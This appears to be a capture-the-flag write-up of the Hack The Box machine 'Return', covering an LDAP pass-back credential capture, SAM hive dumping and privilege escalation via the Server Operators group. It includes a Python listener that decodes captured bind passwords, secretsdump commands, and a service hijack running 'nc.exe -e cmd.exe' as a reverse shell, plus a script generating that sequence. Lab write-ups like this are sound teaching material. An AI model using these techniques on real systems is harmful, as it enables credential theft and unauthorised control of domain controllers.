Hello everyone, in today’s post we are going over another Active Directory box from Hack The Box – Return. Enjoy!
1) Starting off with the Nmap scan, as usual:
2) There is a lot going on here, but the most interesting part for now is port 80, the web server:
2.1) Whenever I am doing an Active Directory box and I see devices such as printers, the first thing that comes to my mind is LDAP and the pass-back attack! It becomes very interesting if we can control where the printer connects to: by pointing it at a host we control and intercepting the connection, we can capture the credentials, because an LDAP simple bind sends the DN and password in clear text unless the session is protected by TLS.
2.2) Enumerating the website further, we can see that we can indeed control where this printer connects to, and on top of that the page already holds the service account and a hidden (masked) password that it uses to initiate the connection:
2.3) I changed the previous Server Address to my IP (tun0), left the port as 389 (LDAP), and started a netcat listener on port 389. This way we can intercept the bind request and obtain the clear-text password for svc-printer!
nc -lvnp 389
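With plain netcat the password arrives mixed into raw BER bytes on the terminal. The following is an added example (not code from the original post) that does the part netcat leaves to you: it decodes the LDAP BindRequest (RFC 4511, simple authentication choice) and returns the bind DN and password as strings. It assumes the printer performs a simple bind, as the pass-back attack relies on; the DN and password used as sample input are constructed values, not the box's credentials. The same decoder is used to build the sample input, which also exercises the long-form BER length a longer DN needs.

```python
"""Minimal LDAP simple-bind decoder for a pass-back listener (added example)."""
import socket
from typing import Tuple


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, next_pos) for the BER TLV starting at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _encode_tlv(tag: int, value: bytes) -> bytes:
    """Encode one BER TLV, using long-form length where the value exceeds 127 bytes."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


def parse_simple_bind(msg: bytes) -> Tuple[int, str, str]:
    """Decode an LDAPMessage carrying a BindRequest with simple authentication.

    Returns (version, bind DN, password). Anything else (a search, a SASL bind,
    a random probe hitting port 389) raises ValueError instead of being
    mistaken for captured credentials.
    """
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, _message_id, pos = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, bind, _ = _read_tlv(body, pos)
    if tag != 0x60:  # [APPLICATION 0] constructed = BindRequest
        raise ValueError("protocolOp is not a BindRequest")
    tag, ver, pos = _read_tlv(bind, 0)
    if tag != 0x02:
        raise ValueError("missing LDAP version")
    tag, name, pos = _read_tlv(bind, pos)
    if tag != 0x04:
        raise ValueError("missing bind DN")
    tag, auth, _ = _read_tlv(bind, pos)
    if tag != 0x80:  # [0] simple; 0xA3 would be the SASL choice
        raise ValueError("bind does not use simple authentication")
    return int.from_bytes(ver, "big"), name.decode("utf-8", "replace"), auth.decode("utf-8", "replace")


def build_simple_bind(dn: str, password: str, message_id: int = 1, version: int = 3) -> bytes:
    """Encode a simple BindRequest (single-byte INTEGERs are enough for the sample)."""
    bind = (_encode_tlv(0x02, bytes([version]))
            + _encode_tlv(0x04, dn.encode())
            + _encode_tlv(0x80, password.encode()))
    return _encode_tlv(0x30, _encode_tlv(0x02, bytes([message_id])) + _encode_tlv(0x60, bind))


def serve_once(port: int = 389) -> Tuple[str, Tuple[int, str, str]]:
    """Accept one connection and return (peer IP, decoded bind). Needs root for port 389."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
    return peer[0], parse_simple_bind(data)


# Constructed sample bind; the DN and password are placeholders, not the box's values.
SAMPLE_BIND = build_simple_bind("CN=svc-printer,CN=Users,DC=example,DC=local", "Passw0rd!")

if __name__ == "__main__":
    print(parse_simple_bind(SAMPLE_BIND))
```

Run it with `sudo python3 listener.py` after replacing the `__main__` call with `serve_once()`, then trigger the printer's connection test from the web interface; the decoded tuple is what the netcat listener shows as raw bytes.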
3) Check right away whether svc-printer is a member of Remote Management Users, meaning that we can connect remotely to the machine via evil-winrm:
Bingo! We got user.txt. Let’s see how we can escalate our privileges.
3.1) I started, as usual, with BloodHound enumeration. While the data was being collected, I moved on to manual enumeration and spotted that svc-printer holds some very dangerous privileges (whoami /priv lists them), in particular SeBackupPrivilege and SeRestorePrivilege:
3.2) This can be an easy win: SeBackupPrivilege lets us read files regardless of their ACL, so we can save copies of the SAM and SYSTEM hives and use them to dump the local account hashes from the target machine. So that is exactly what I did:
reg save hklm\sam SAM
reg save hklm\system SYSTEM
3.4) Then we can use the handy download feature of evil-winrm to fetch those two files, and use secretsdump to extract the hashes from them:
secretsdump.py -sam SAM -system SYSTEM LOCAL
3.5) Cool, we got the hashes! The last thing to do is pass the hash, via evil-winrm for example or your other favourite tool:
3.6) But wait… that doesn’t work?!
The reason is worth spelling out: this box is a domain controller (Server Operators, which we meet below, only exists as a built-in group on DCs), and on a DC the SAM hive holds only the local machine accounts. Domain accounts, including the domain Administrator, live in NTDS.dit, so the hashes dumped from SAM are not the ones the domain authenticates with. The same privilege can also back up NTDS.dit from a shadow copy, but that is a longer route than the one that follows.
3.7) Hmmm… Let’s look at the BloodHound output:
4) We can see that svc-printer is a member of the Server Operators group. Membership itself is not the vulnerability, but this group has dangerous rights on domain controllers, among them starting, stopping and reconfiguring services; more details can be found in this great post: https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/:
By following the blog post I can list the services present on the target host, and I see that I am not alone: somebody else is also rooting the machine and has already edited the VMTools service. That is not a problem, we can overwrite their command:
4.1) So, following the blog post, we can make use of our membership in the Server Operators group to reconfigure a service, in this case VMTools. nc.exe has to be uploaded to the target first (evil-winrm’s upload feature does the job) and the binary path must point at wherever it landed; note that sc.exe requires a space after binPath= or it rejects the argument:
1) sc.exe config VMTools binPath= "C:\Users\aarti\Documents\nc.exe -e cmd.exe <YOUR_IP_HERE> 1234" (on the target)
2) nc -lvnp 1234 (on the attacking machine)
3) sc.exe stop VMTools (on the target)
4) sc.exe start VMTools (on the target; it reports a timeout because nc.exe is not a real service binary, but the shell still arrives)
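A small helper for the step above, added here as an example and not code from the original post or the linked article: it parses the output of `sc qc <service>` so the original binary path is recorded before we overwrite it, and builds the sc.exe command sequence with the quoting sc.exe actually accepts, including a restore command so the service is left usable afterwards (the post notes that someone else had already edited VMTools, which is exactly the mess a restore step avoids). The service name and nc.exe location are the post’s; the `sc qc` text and the attacker IP are constructed samples.

```python
"""Record a service's original binPath and build the Server Operators hijack sequence (added example)."""
import re
from typing import Dict, List

# Constructed sample of `sc qc VMTools` output in the standard format (not captured from the box).
SAMPLE_SC_QC = """[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VMware Tools
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn `sc qc` output into a dict keyed by field name (e.g. BINARY_PATH_NAME)."""
    config: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s?(.*)$", line)
        if m:
            config[m.group(1)] = m.group(2).strip()
    return config


def _quote(path: str) -> str:
    """sc.exe needs the whole binPath in double quotes when it contains spaces."""
    if path.startswith('"') or " " not in path:
        return path
    return f'"{path}"'


def hijack_commands(service: str, nc_path: str, lhost: str, lport: int,
                    original_binpath: str) -> List[str]:
    """Commands to run on the target; the netcat listener runs on the attacker side.

    The space after `binPath=` is mandatory: sc.exe treats `binPath=` as the
    option name and the next token as its value.
    """
    payload = f"{nc_path} -e cmd.exe {lhost} {lport}"
    return [
        f'sc.exe config {service} binPath= "{payload}"',
        f"sc.exe stop {service}",
        # start reports a timeout (nc.exe never signals the SCM), but the shell still connects back
        f"sc.exe start {service}",
        # run once the shell is in, so the service is left as we found it
        f"sc.exe config {service} binPath= {_quote(original_binpath)}",
    ]


if __name__ == "__main__":
    cfg = parse_sc_qc(SAMPLE_SC_QC)
    # 10.10.14.5 is a sample attacker address, not the post's.
    for cmd in hijack_commands(cfg["SERVICE_NAME"], r"C:\Users\aarti\Documents\nc.exe",
                               "10.10.14.5", 1234, cfg["BINARY_PATH_NAME"]):
        print(cmd)
```

Paste the real `sc qc VMTools` output from the evil-winrm session into `SAMPLE_SC_QC` (or read it from a file) and the last command restores whatever path the service had, including a path another player left behind.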
4.2) And we got the elevated shell. GG!
Lessons Learned
1) Amazing box overall. The first lesson is the pass-back attack, which can be a very handy and easy win for further exploitation.
2) The second lesson I learned is definitely that a box can have multiple privilege escalation paths, but that doesn’t mean that each one works. In this instance, I thought that saving the SAM & SYSTEM hives and dumping hashes from them was the way to victory, but it wasn’t. It’s always worth checking everything twice and taking a step back if needed.
3) The third lesson I learned is the dangerous Server Operators group, which allows us to reconfigure services and escalate our privileges that way!